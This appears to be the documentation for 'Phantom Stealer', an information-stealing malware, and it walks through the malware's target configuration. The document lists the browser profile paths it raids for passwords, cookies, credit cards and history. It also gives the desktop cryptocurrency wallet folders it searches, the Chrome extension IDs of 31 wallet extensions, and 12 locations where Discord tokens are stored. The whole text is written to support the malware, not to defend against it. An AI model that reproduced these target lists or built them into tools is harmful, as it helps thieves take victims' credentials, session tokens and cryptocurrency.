Overview Phantom Stealer targets a wide range of browsers, cryptocurrency wallets, and messaging applications. All target definitions are located in config/config.go.
Paths are relative to the user’s home directory. The stealer automatically resolves paths like AppData\Roaming and AppData\Local.
Browser Targets The BrowserPaths map defines all supported browsers with their configuration paths.
Chromium-Based Browsers Google Chrome { Path : "AppData \\ Local \\ Google \\ Chrome \\ User Data" , Profile : "Default" , Type : "chromium" , }
Extracts passwords, cookies, credit cards, and history from Chrome’s default profile. Microsoft Edge { Path : "AppData \\ Local \\ Microsoft \\ Edge \\ User Data" , Profile : "Default" , Type : "chromium" , }
Brave Browser { Path : "AppData \\ Local \\ BraveSoftware \\ Brave-Browser \\ User Data" , Profile : "Default" , Type : "chromium" , }
Opera Stable { Path : "AppData \\ Roaming \\ Opera Software \\ Opera Stable" , Profile : "" , Type : "chromium" , }
Opera doesn’t use a profile subfolder, hence the empty Profile field.
Opera GX (gaming-focused Opera variant){ Path : "AppData \\ Roaming \\ Opera Software \\ Opera GX Stable" , Profile : "" , Type : "chromium" , }
Vivaldi Browser { Path : "AppData \\ Local \\ Vivaldi \\ User Data" , Profile : "Default" , Type : "chromium" , }
Yandex Browser { Path : "AppData \\ Local \\ Yandex \\ YandexBrowser \\ User Data" , Profile : "Default" , Type : "chromium" , }
Chromium (open-source base){ Path : "AppData \\ Local \\ Chromium \\ User Data" , Profile : "Default" , Type : "chromium" , }
Firefox-Based Browsers Firefox browsers use different encryption than Chromium browsers and require special handling.
Mozilla Firefox { Path : "AppData \\ Roaming \\ Mozilla \\ Firefox \\ Profiles" , Profile : "" , Type : "firefox" , }
Uses its own encryption scheme separate from Windows DPAPI. Waterfox { Path : "AppData \\ Roaming \\ Waterfox \\ Profiles" , Profile : "" , Type : "firefox" , }
BrowserConfig Structure type BrowserConfig struct { Path string // Base path to browser data Profile string // Profile subfolder (empty if not used) Type string // "chromium" or "firefox" }
Desktop Wallet Targets The WalletTargets map defines paths to desktop cryptocurrency wallet applications.
Popular Wallets Exodus Wallet - Multi-currency desktop wallet with built-in exchange.
WalletTargets["Electrum"]
string
default: "\"AppData\\\\Roaming\\\\Electrum\\\\wallets\""
Electrum - Popular Bitcoin wallet.
Atomic Wallet - Multi-currency wallet with staking support.
Jaxx Liberty - Deprecated but still widely used multi-currency wallet.
Coinomi - Multi-currency wallet with strong privacy features.
Guarda Wallet - Multi-platform cryptocurrency wallet.
Core Wallets Official wallets for major cryptocurrencies. These typically store funds in wallet.dat files.
WalletTargets["BitcoinCore"]
string
default: "\"AppData\\\\Roaming\\\\Bitcoin\\\\wallets\""
Bitcoin Core - Official Bitcoin wallet implementation.
WalletTargets["LitecoinCore"]
string
default: "\"AppData\\\\Roaming\\\\Litecoin\\\\wallets\""
Litecoin Core - Official Litecoin wallet.
WalletTargets["DashCore"]
string
default: "\"AppData\\\\Roaming\\\\DashCore\\\\wallets\""
Dash Core - Official Dash wallet.
Privacy-Focused Wallets WalletTargets["Monero"]
string
default: "\"Documents\\\\Monero\\\\wallets\""
Monero Wallet - Privacy cryptocurrency wallet.Monero uses an unusual path in the Documents folder instead of AppData.
WalletTargets["ZCash"]
string
default: "\"AppData\\\\Roaming\\\\Zcash\""
ZCash Wallet - Privacy-focused cryptocurrency wallet.
Wasabi Wallet - Bitcoin wallet with built-in CoinJoin mixing for enhanced privacy.
Browser Extension Wallets The ExtensionTargets map contains Chrome extension IDs for cryptocurrency wallet extensions. These IDs are universal across Chromium-based browsers (Chrome, Edge, Brave, Opera, etc.).
Major Extensions ExtensionTargets["Metamask"]
string
default: "\"nkbihfbeogaeaoehlefnkodbefgpgknn\""
MetaMask - Most popular Ethereum and EVM-compatible wallet extension.
ExtensionTargets["TronLink"]
string
default: "\"ibnejdfjmmkpcnlpebklmnkoeoihofec\""
TronLink - Official Tron network wallet.
ExtensionTargets["BinanceChain"]
string
default: "\"fhbohimaelbohpjbbldcngcnapndodjp\""
Binance Chain Wallet - BNB and BSC wallet extension.
ExtensionTargets["Coin98"]
string
default: "\"aeachknmefphepccionboohckonoeemg\""
Coin98 Wallet - Multi-chain DeFi wallet.
ExtensionTargets["Phantom"]
string
default: "\"bfnaelmomeimhlpmgjnjophhpkkoljpa\""
Phantom - Popular Solana wallet extension.
Additional Extensions
Cosmos & Multi-Chain Wallets
ExtensionTargets["Keplr"]
string
default: "\"dmkamcknogkgcdfhhbddcghachkejeap\""
Keplr - Cosmos ecosystem wallet.
ExtensionTargets["Terra"]
string
default: "\"aiifbnbfobpmeekipheeijimdpnlpgpp\""
Terra Station - Terra blockchain wallet.
ExtensionTargets["XDEFI"]
string
default: "\"hmeobnfnfcmdkdcmlblgagmfpfboieaf\""
XDEFI Wallet - Multi-chain DeFi wallet.
ExtensionTargets["Sollet"]
string
default: "\"fhmfendgdocmcbmfikdcogofphimnkno\""
Sollet - Solana wallet extension.
ExtensionTargets["Slope"]
string
default: "\"pocmplpaccanhmnllbbkpgfliimjljgo\""
Slope - Solana wallet with mobile sync.
ExtensionTargets["Ronin"]
string
default: "\"fnjhmkhhmkbjkkabndcnnogagogbneec\""
Ronin Wallet - Axie Infinity and gaming-focused wallet.
ExtensionTargets["Wombat"]
string
default: "\"amkmjjmmflddogmhpjloimipbofnfjih\""
Wombat - Gaming and NFT wallet.
ExtensionTargets["GuildWallet"]
string
default: "\"nanjmdknhkinifnkgdcggcfnhdaammmj\""
Guild Wallet - Gaming guild treasury wallet.
ExtensionTargets["BraveWallet"]
string
default: "\"odbfpeeihdkbihmopkbjmoonfanlbfcl\""
Brave Wallet - Built-in Brave browser wallet.
ExtensionTargets["Coinbase"]
string
default: "\"hnfanknocfeofbddgcijnmhnfnkdnaad\""
Coinbase Wallet - Self-custody wallet from Coinbase.
ExtensionTargets["Trust"]
string
default: "\"egjidjbpglichdcondbcbdnbeeppgdph\""
Trust Wallet - Multi-currency mobile and extension wallet.
ExtensionTargets["MEWcx"]
string
default: "\"nlbmnnijcnlegkjjpcfjclmcfggfefdm\""
MEW CX - MyEtherWallet Chrome extension.
ExtensionTargets["OneKey"]
string
default: "\"infeboajgfhgbjpjbeppbkgnabfdkdaf\""
OneKey - Open-source hardware wallet companion.
ExtensionTargets["BitKeep"]
string
default: "\"jiidiaalihmmhddjgbnbgdfflelocpak\""
BitKeep - Multi-chain DeFi wallet.
ExtensionTargets["Math"]
string
default: "\"afbcbjpbpfadlkmhmclhkeeodmamcflc\""
Math Wallet - Multi-platform crypto wallet.
ExtensionTargets["Hashpack"]
string
default: "\"gjagmgiddbbciopjhllkdnddhcglnemk\""
HashPack - Hedera (HBAR) wallet.
ExtensionTargets["TON"]
string
default: "\"nphplpgoakhhjchkkhmiggakijnkhfnd\""
TON Wallet - The Open Network wallet.
ExtensionTargets["Starcoin"]
string
default: "\"mfhbebgoclkghebffdldpobeajmbecfk\""
Starcoin - Starcoin blockchain wallet.
ExtensionTargets["Swash"]
string
default: "\"cmndjbecilbocjfkibfbifhngkdmjgog\""
Swash - Data monetization wallet.
ExtensionTargets["Finnie"]
string
default: "\"cjmkndjhnagcfbpiemnkdpomccnjblmj\""
Finnie - Koii network wallet.
ExtensionTargets["iWallet"]
string
default: "\"kncchdigobghenbbaddojjnnaogfppfj\""
iWallet - Multi-chain wallet.
ExtensionTargets["Oxygen"]
string
default: "\"fhilaheimglignddkjgofkcbgekhenbh\""
Oxygen - DeFi wallet.
ExtensionTargets["NeoLine"]
string
default: "\"cphhlgmgameodnhkjdmkpanlelnlohao\""
NeoLine - NEO blockchain wallet.
ExtensionTargets["KHC"]
string
default: "\"hcflpincpppdclinealmandijcmnkbgn\""
KHC - KuCoin Community Chain wallet.
ExtensionTargets["GeroWallet"]
string
default: "\"bgpipimickeadkjlklgciifhnalhdjhe\""
Gero Wallet - Cardano wallet.
ExtensionTargets["Clover"]
string
default: "\"nhnkbkgjikgcigadomkphalanndcapjk\""
Clover - Multi-chain wallet.
ExtensionTargets["Halo"]
string
default: "\"ocdciohofkgohmibehfoijjbkfgobpob\""
Halo - Klay (Klaytn) wallet.
Discord Token Paths The DiscordPaths array contains all locations where Discord authentication tokens might be stored.
Desktop Client Paths // Discord Desktop Clients "AppData \\ Roaming \\ discord \\ Local Storage \\ leveldb" "AppData \\ Roaming \\ discordcanary \\ Local Storage \\ leveldb" "AppData \\ Roaming \\ discordptb \\ Local Storage \\ leveldb" "AppData \\ Local \\ Discord \\ Local Storage \\ leveldb" "AppData \\ Local \\ DiscordCanary \\ Local Storage \\ leveldb" "AppData \\ Local \\ DiscordPTB \\ Local Storage \\ leveldb"
Discord has three release channels: Stable, Canary (beta), and PTB (Public Test Build). Each stores tokens separately.
Browser Session Paths For users who access Discord through web browsers instead of the desktop app:
// Opera Browsers "AppData \\ Roaming \\ Opera Software \\ Opera Stable \\ Local Storage \\ leveldb" "AppData \\ Roaming \\ Opera Software \\ Opera GX Stable \\ Local Storage \\ leveldb" // Google Chrome "AppData \\ Local \\ Google \\ Chrome \\ User Data \\ Default \\ Local Storage \\ leveldb" // Brave Browser "AppData \\ Local \\ BraveSoftware \\ Brave-Browser \\ User Data \\ Default \\ Local Storage \\ leveldb" // Yandex Browser "AppData \\ Local \\ Yandex \\ YandexBrowser \\ User Data \\ Default \\ Local Storage \\ leveldb" // Microsoft Edge "AppData \\ Local \\ Microsoft \\ Edge \\ User Data \\ Default \\ Local Storage \\ leveldb"
All these paths must be checked since users may have Discord tokens in multiple locations if they use both desktop and web versions.
Complete Target Summary
Browsers : 10 different browsers (8 Chromium-based, 2 Firefox-based)Desktop Wallets : 12 applicationsExtension Wallets : 31 browser extensionsDiscord Paths : 12 locations (6 desktop + 6 browser)Total Targets : 65+ applications and services